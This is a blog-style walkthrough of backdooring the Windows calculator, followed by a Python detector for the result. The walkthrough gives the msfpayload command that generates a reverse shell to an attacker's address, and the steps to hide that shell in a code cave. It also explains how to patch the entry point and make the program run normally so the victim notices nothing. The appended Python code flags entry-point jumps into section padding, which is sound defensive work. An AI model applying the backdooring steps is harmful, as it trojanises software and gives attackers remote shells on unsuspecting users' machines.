Hi there, today we are going to inject a Windows cmd reverse shell from Metasploit into a simple Windows executable. We'll place our backdoor inside calc.exe.
I will explain exactly what I did here; you can do the thinkin' and extract the "generic process" of backdooring an exe from this example.
We start by opening calc.exe with some debugger like OllyDbg, then we start the process.
First of all we have to locate some empty space inside the file (a code cave); we'll insert our evil payload there.
Then we select the starting address of our evil payload and take note of it. The first thing we have to do inside our evil payload is to save the registers at that point of the execution; we will restore them later, allowing calc.exe to run normally. We can save the values of the registers and flags on the stack with pushad and pushfd.
Next thing to do is to generate our evil payload with Metasploit as hex; this cool one-liner can do the job:
msfpayload windows/shell_reverse_tcp LHOST=192.168.11.3 LPORT=443 R | hexdump -v -e '"\\""x" 1/1 "%02x" ""' | sed 's/[\"x;]//g'
And then paste all the code in our code cave, just after pushad and pushfd.
Now we browse to the entry point of the program, copy the first instructions, and replace the first one with a JMP to our payload.
Don't forget to take notes about every step.
Now we start testing how our code works: we have to note what ESP points to just after pushing the registers and flags onto the stack, and what it points to after our payload has executed.
We compute the difference between these two ESP values and insert an instruction like ADD ESP,DIFFERENCE; this restores the ESP register to our desired value (the one we noted right after the pushes).
After doing that, we place the first instructions that were overwritten by our JMP at the end of the payload, and finally we insert a JMP to the next instruction so execution continues normally. Now we save all those changes and run calc.exe.
meanwhile on msfconsole…
The infected program only runs once the shell is closed on Metasploit; that's because a parameter of one of the payload's function calls is set to -1 (INFINITE, i.e. wait forever) (https://msdn.microsoft.com/es-es/library/windows/desktop/ms687032%28v=vs.85%29.aspx).
We can solve that by finding DEC ESI, PUSH ESI, INC ESI in the payload
and replacing DEC ESI and PUSH ESI with NOPs.
Now the program runs as if nothing is happening, and a really nice shell appears on the Metasploit handler.
The cool stuff will begin in the next chapter P-)
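From the defender's side, the tell-tale artifact of the procedure above is an entry point that begins with a JMP into section padding (the code cave). The following is an added example, not part of the original post, that parses a PE32 with the standard library and flags that pattern; build_sample_pe and jmp_rel32 construct fake test input and are assumptions, not real binaries.

```python
import struct

def parse_pe(data):
    """Return (entry_rva, sections) from raw PE bytes; a section is
    (name, virt_addr, virt_size, raw_ptr, raw_size). Stdlib only."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    entry_rva = struct.unpack_from("<I", data, pe + 40)[0]   # optional header + 16
    secs, off = [], pe + 24 + opt_size
    for i in range(nsec):                                    # 40-byte section headers
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, off + 40 * i)
        secs.append((name.rstrip(b"\0").decode(), va, vsize, rptr, rsize))
    return entry_rva, secs

def section_of(secs, rva):
    """Section whose mapped range (larger of VirtualSize / raw size) contains rva."""
    for s in secs:
        if s[1] <= rva < s[1] + max(s[2], s[4]):
            return s
    return None

def classify_entry_jump(data):
    """'clean': no rel32 JMP (E9) at the entry point, or it targets real code in its own section;
    'cave': target is in padding past VirtualSize or in no section; 'cross-section': elsewhere."""
    entry_rva, secs = parse_pe(data)
    home = section_of(secs, entry_rva)
    if home is None:
        raise ValueError("entry point is outside every section")
    off = home[3] + (entry_rva - home[1])                     # RVA -> file offset
    if data[off] != 0xE9:
        return "clean"          # note: many legitimate CRT entry stubs also start with a JMP
    target = (entry_rva + 5 + struct.unpack_from("<i", data, off + 1)[0]) & 0xFFFFFFFF
    dest = section_of(secs, target)
    if dest is None or (dest is home and target >= home[1] + home[2]):
        return "cave"
    return "clean" if dest is home else "cross-section"

def build_sample_pe(first_bytes, vsize=0x100, rsize=0x200):
    """Constructed minimal PE32 with one .text section at RVA 0x1000 (test input only)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    opt = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", 0x1000) + b"\0" * 204
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    sec = struct.pack("<8sIIIIIIHHI", b".text", vsize, 0x1000, rsize, 0x200, 0, 0, 0, 0, 0x60000020)
    hdr = dos + b"PE\0\0" + coff + opt + sec
    return hdr.ljust(0x200, b"\0") + first_bytes.ljust(rsize, b"\0")

def jmp_rel32(src_rva, dst_rva):              # E9 <rel32>, for the constructed samples
    return b"\xe9" + struct.pack("<i", dst_rva - (src_rva + 5))
```

A JMP at the entry point alone is not proof of tampering; the signal worth alerting on is a target in section slack or outside any section, which is exactly what the cave-based procedure leaves behind.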